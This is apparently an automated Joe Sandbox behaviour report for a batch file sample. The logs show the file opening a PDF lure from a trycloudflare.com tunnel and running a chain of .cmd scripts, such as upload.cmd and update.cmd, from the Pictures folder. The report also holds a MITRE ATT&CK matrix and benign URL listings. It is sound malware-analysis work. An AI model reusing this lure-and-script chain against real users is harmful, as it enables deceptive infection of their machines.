Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.bat" MY_FLAG
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\kam.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\las.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\zap.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\sample.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\xff.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\time.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\upload.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2636,i,6799672374632597056,542459975997173422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\update.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\info.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.bat" MY_FLAG	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\kam.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\las.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\zap.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\sample.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\xff.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\time.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\upload.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\update.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\info.cmd""	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2636,i,6799672374632597056,542459975997173422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.bat" MY_FLAG	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\kam.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\las.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\zap.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\sample.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\xff.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\time.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\upload.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\update.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Pictures\info.cmd""	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.bat	0%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://mercadolivre.com	0%	Avira URL Cloud	safe
https://wieistmeineip.de	0%	Avira URL Cloud	safe
https://reshim.org	0%	Avira URL Cloud	safe
https://mercadoshops.com.co	0%	Avira URL Cloud	safe
https://poalim.xyz	0%	Avira URL Cloud	safe
https://gliadomain.com	0%	Avira URL Cloud	safe
https://mercadoshops.com.br	0%	Avira URL Cloud	safe
https://medonet.pl	0%	Avira URL Cloud	safe
https://nourishingpursuits.com	0%	Avira URL Cloud	safe
https://unotv.com	0%	Avira URL Cloud	safe
https://joyreactor.cc	0%	Avira URL Cloud	safe
https://elfinancierocr.com	0%	Avira URL Cloud	safe
https://baomoi.com	0%	Avira URL Cloud	safe
https://supereva.it	0%	Avira URL Cloud	safe
https://desimartini.com	0%	Avira URL Cloud	safe
https://bolasport.com	0%	Avira URL Cloud	safe
https://hearty.app	0%	Avira URL Cloud	safe
https://songstats.com	0%	Avira URL Cloud	safe
https://zdrowietvn.pl	0%	Avira URL Cloud	safe
https://rws1nvtvt.com	0%	Avira URL Cloud	safe
https://heartymail.com	0%	Avira URL Cloud	safe
https://hearty.gift	0%	Avira URL Cloud	safe
https://mercadoshops.com	0%	Avira URL Cloud	safe
https://radio2.be	0%	Avira URL Cloud	safe
https://songshare.com	0%	Avira URL Cloud	safe
https://finn.no	0%	Avira URL Cloud	safe
https://mercadopago.com.mx	0%	Avira URL Cloud	safe
https://mystudentdashboard.com	0%	Avira URL Cloud	safe
https://hc1.com	0%	Avira URL Cloud	safe
https://kompas.tv	0%	Avira URL Cloud	safe
https://talkdeskqaid.com	0%	Avira URL Cloud	safe
https://mercadopago.com.pe	0%	Avira URL Cloud	safe
https://cardsayings.net	0%	Avira URL Cloud	safe
https://joyreactor.com	0%	Avira URL Cloud	safe
https://mightytext.net	0%	Avira URL Cloud	safe
https://wildixin.com	0%	Avira URL Cloud	safe
https://cookreactor.com	0%	Avira URL Cloud	safe
https://pudelek.pl	0%	Avira URL Cloud	safe
https://nacion.com	0%	Avira URL Cloud	safe
https://eworkbookcloud.com	0%	Avira URL Cloud	safe
https://chennien.com	0%	Avira URL Cloud	safe
https://mercadopago.cl	0%	Avira URL Cloud	safe
https://talkdeskstgid.com	0%	Avira URL Cloud	safe
https://bonvivir.com	0%	Avira URL Cloud	safe
https://wpext.pl	0%	Avira URL Cloud	safe
https://carcostadvisor.be	0%	Avira URL Cloud	safe
https://salemovetravel.com	0%	Avira URL Cloud	safe
https://welt.de	0%	Avira URL Cloud	safe
https://poalim.site	0%	Avira URL Cloud	safe
https://blackrockadvisorelite.it	0%	Avira URL Cloud	safe
https://cafemedia.com	0%	Avira URL Cloud	safe
https://mercadoshops.com.ar	0%	Avira URL Cloud	safe
https://elpais.uy	0%	Avira URL Cloud	safe
https://landyrev.com	0%	Avira URL Cloud	safe
https://eleconomista.net	0%	Avira URL Cloud	safe
https://tucarro.com.ve	0%	Avira URL Cloud	safe
https://rws3nvtvt.com	0%	Avira URL Cloud	safe
https://commentcamarche.com	0%	Avira URL Cloud	safe
https://mercadolivre.com.br	0%	Avira URL Cloud	safe
https://clmbtech.com	0%	Avira URL Cloud	safe
https://standardsandpraiserepurpose.com	0%	Avira URL Cloud	safe
https://salemovefinancial.com	0%	Avira URL Cloud	safe
https://commentcamarche.net	0%	Avira URL Cloud	safe
https://hj.rs	0%	Avira URL Cloud	safe
https://mercadopago.com.br	0%	Avira URL Cloud	safe
https://mercadolibre.com.gt	0%	Avira URL Cloud	safe
https://mighty-app.appspot.com	0%	Avira URL Cloud	safe
https://etfacademy.it	0%	Avira URL Cloud	safe
https://hearty.me	0%	Avira URL Cloud	safe
https://timesinternet.in	0%	Avira URL Cloud	safe
https://idbs-staging.com	0%	Avira URL Cloud	safe
https://blackrock.com	0%	Avira URL Cloud	safe
https://mercadolibre.co.cr	0%	Avira URL Cloud	safe
https://idbs-eworkbook.com	0%	Avira URL Cloud	safe
https://vrt.be	0%	Avira URL Cloud	safe
https://hjck.com	0%	Avira URL Cloud	safe
https://kompas.com	0%	Avira URL Cloud	safe
https://wingify.com	0%	Avira URL Cloud	safe
https://idbs-dev.com	0%	Avira URL Cloud	safe
https://prisjakt.no	0%	Avira URL Cloud	safe
https://mercadolibre.cl	0%	Avira URL Cloud	safe
https://mercadopago.com.ar	0%	Avira URL Cloud	safe
https://player.pl	0%	Avira URL Cloud	safe
https://mercadolibre.com.hn	0%	Avira URL Cloud	safe
https://tucarro.com.co	0%	Avira URL Cloud	safe
https://nien.com	0%	Avira URL Cloud	safe
https://landyrev.ru	0%	Avira URL Cloud	safe
https://linternaute.com	0%	Avira URL Cloud	safe
https://een.be	0%	Avira URL Cloud	safe
https://punjabijagran.com	0%	Avira URL Cloud	safe
https://clarosports.com	0%	Avira URL Cloud	safe
https://abczdrowie.pl	0%	Avira URL Cloud	safe
https://gallito.com.uy	0%	Avira URL Cloud	safe
https://cmxd.com.mx	0%	Avira URL Cloud	safe
https://grupolpg.sv	0%	Avira URL Cloud	safe
https://ocdn.eu	0%	Avira URL Cloud	safe
https://mercadolibre.com.ve	0%	Avira URL Cloud	safe
https://rws2nvtvt.com	0%	Avira URL Cloud	safe
https://money.pl	0%	Avira URL Cloud	safe
https://stripe.network	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	142.250.186.46	true	false	unknown
www.google.com	142.250.185.164	true	false	unknown
valuable-gazette-shock-medication.trycloudflare.com	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wieistmeineip.de	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.co	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://gliadomain.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://poalim.xyz	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolivre.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://reshim.org	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://nourishingpursuits.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://medonet.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://unotv.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.br	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://joyreactor.cc	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://zdrowietvn.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://songstats.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://baomoi.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://supereva.it	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://elfinancierocr.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://bolasport.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://rws1nvtvt.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://desimartini.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hearty.app	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hearty.gift	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://heartymail.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://radio2.be	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://finn.no	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hc1.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://kompas.tv	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mystudentdashboard.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://songshare.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.mx	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://talkdeskqaid.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.pe	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://cardsayings.net	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mightytext.net	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://pudelek.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://joyreactor.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://cookreactor.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://wildixin.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://eworkbookcloud.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://nacion.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://chennien.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.cl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://talkdeskstgid.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://bonvivir.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://carcostadvisor.be	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://salemovetravel.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://wpext.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://welt.de	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://poalim.site	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://blackrockadvisorelite.it	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://cafemedia.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.ar	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://elpais.uy	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://landyrev.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://commentcamarche.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://tucarro.com.ve	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://rws3nvtvt.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://eleconomista.net	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolivre.com.br	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://clmbtech.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://standardsandpraiserepurpose.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://salemovefinancial.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.br	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://commentcamarche.net	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://etfacademy.it	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mighty-app.appspot.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hj.rs	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hearty.me	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.com.gt	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://timesinternet.in	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://idbs-staging.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://blackrock.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://idbs-eworkbook.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.co.cr	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://hjck.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://vrt.be	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://prisjakt.no	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://kompas.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://idbs-dev.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://wingify.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.cl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://player.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.ar	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.com.hn	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://linternaute.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://tucarro.com.co	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://landyrev.ru	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://clarosports.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://een.be	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://nien.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://punjabijagran.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://cmxd.com.mx	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://grupolpg.sv	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://rws2nvtvt.com	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://abczdrowie.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://gallito.com.uy	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://money.pl	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.com.ve	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://stripe.network	sets.json.6.dr	false	Avira URL Cloud: safe	unknown
https://ocdn.eu	sets.json.6.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.164	www.google.com	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.7
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446632
Start date and time:	2024-05-23 18:23:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.bat
Detection:	CLEAN
Classification:	clean4.winBAT@53/5@22/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
